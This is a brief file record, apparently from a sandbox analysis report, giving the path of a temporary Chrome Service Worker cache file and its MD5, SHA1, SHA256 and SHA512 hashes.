C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5c04ca.TMP

MD5 115fab6115f81a45e33d0b36d1981c9d
SHA1 4baaab1477f7d26ad2b78f00e5e8bed327401aa4
SHA256 969322a28dba44386c91cf637e31dd370b97d767c1cc62e223781bc219f0c0ae
SHA512 20dfc4e71678de9981b2f3695b3a7743c14cc6113b8df40d6e710ff6cd3ca5d8fc5f6d7d5a0353a1a888e989a3d9e9348a958ee38c5e1933b156e71b6d123f33